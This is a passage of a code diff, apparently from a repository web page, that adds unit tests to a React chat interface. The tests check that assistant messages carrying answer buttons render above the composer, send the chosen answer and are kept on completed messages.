||||
});
|
||||
|
||||
@ -7,11 +7,22 @@ import { ClientProvider } from "@/providers/ClientProvider";
|
||||
|
||||
function makeClient() {
|
||||
const errorHandlers = new Set<(err: { kind: string }) => void>();
|
||||
const chatHandlers = new Map<string, Set<(ev: import("@/lib/types").InboundEvent) => void>>();
|
||||
return {
|
||||
status: "open" as const,
|
||||
defaultChatId: null as string | null,
|
||||
onStatus: () => () => {},
|
||||
onChat: () => () => {},
|
||||
onChat: (chatId: string, handler: (ev: import("@/lib/types").InboundEvent) => void) => {
|
||||
let handlers = chatHandlers.get(chatId);
|
||||
if (!handlers) {
|
||||
handlers = new Set();
|
||||
chatHandlers.set(chatId, handlers);
|
||||
}
|
||||
handlers.add(handler);
|
||||
return () => {
|
||||
handlers?.delete(handler);
|
||||
};
|
||||
},
|
||||
onError: (handler: (err: { kind: string }) => void) => {
|
||||
errorHandlers.add(handler);
|
||||
return () => {
|
||||
@ -21,6 +32,9 @@ function makeClient() {
|
||||
_emitError(err: { kind: string }) {
|
||||
for (const h of errorHandlers) h(err);
|
||||
},
|
||||
_emitChat(chatId: string, ev: import("@/lib/types").InboundEvent) {
|
||||
for (const h of chatHandlers.get(chatId) ?? []) h(ev);
|
||||
},
|
||||
sendMessage: vi.fn(),
|
||||
newChat: vi.fn(),
|
||||
attach: vi.fn(),
|
||||
@ -411,4 +425,46 @@ describe("ThreadShell", () => {
|
||||
await waitFor(() => expect(screen.getByText("from chat b")).toBeInTheDocument());
|
||||
expect(screen.queryByText("from chat a")).not.toBeInTheDocument();
|
||||
});
|
||||
|
||||
it("renders ask_user options above the composer and sends selected answers", async () => {
|
||||
const client = makeClient();
|
||||
const onNewChat = vi.fn().mockResolvedValue("chat-a");
|
||||
|
||||
render(
|
||||
wrap(
|
||||
client,
|
||||
<ThreadShell
|
||||
session={session("chat-a")}
|
||||
title="Chat chat-a"
|
||||
onToggleSidebar={() => {}}
|
||||
onGoHome={() => {}}
|
||||
onNewChat={onNewChat}
|
||||
/>,
|
||||
),
|
||||
);
|
||||
|
||||
await act(async () => {
|
||||
client._emitChat("chat-a", {
|
||||
event: "message",
|
||||
chat_id: "chat-a",
|
||||
text: "How should I continue?",
|
||||
buttons: [["Short answer", "Detailed answer"]],
|
||||
});
|
||||
});
|
||||
|
||||
expect(screen.getByRole("group", { name: "Question" })).toHaveTextContent(
|
||||
"How should I continue?",
|
||||
);
|
||||
|
||||
fireEvent.click(screen.getByRole("button", { name: "Short answer" }));
|
||||
|
||||
expect(client.sendMessage).toHaveBeenCalledWith(
|
||||
"chat-a",
|
||||
"Short answer",
|
||||
undefined,
|
||||
);
|
||||
await waitFor(() => {
|
||||
expect(screen.queryByRole("group", { name: "Question" })).not.toBeInTheDocument();
|
||||
});
|
||||
});
|
||||
});
|
||||
|
||||
@ -113,4 +113,27 @@ describe("useNanobotStream", () => {
|
||||
{ kind: "video", url: "/api/media/sig/payload", name: "demo.mp4" },
|
||||
]);
|
||||
});
|
||||
|
||||
it("keeps assistant buttons on complete messages", () => {
|
||||
const fake = fakeClient();
|
||||
const { result } = renderHook(() => useNanobotStream("chat-q", []), {
|
||||
wrapper: wrap(fake.client),
|
||||
});
|
||||
|
||||
act(() => {
|
||||
fake.emit("chat-q", {
|
||||
event: "message",
|
||||
chat_id: "chat-q",
|
||||
text: "How should I continue?\n\n1. Short answer\n2. Detailed answer",
|
||||
button_prompt: "How should I continue?",
|
||||
buttons: [["Short answer", "Detailed answer"]],
|
||||
});
|
||||
});
|
||||
|
||||
expect(result.current.messages).toHaveLength(1);
|
||||
expect(result.current.messages[0].content).toBe("How should I continue?");
|
||||
expect(result.current.messages[0].buttons).toEqual([
|
||||
["Short answer", "Detailed answer"],
|
||||
]);
|
||||
});
|
||||
});
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user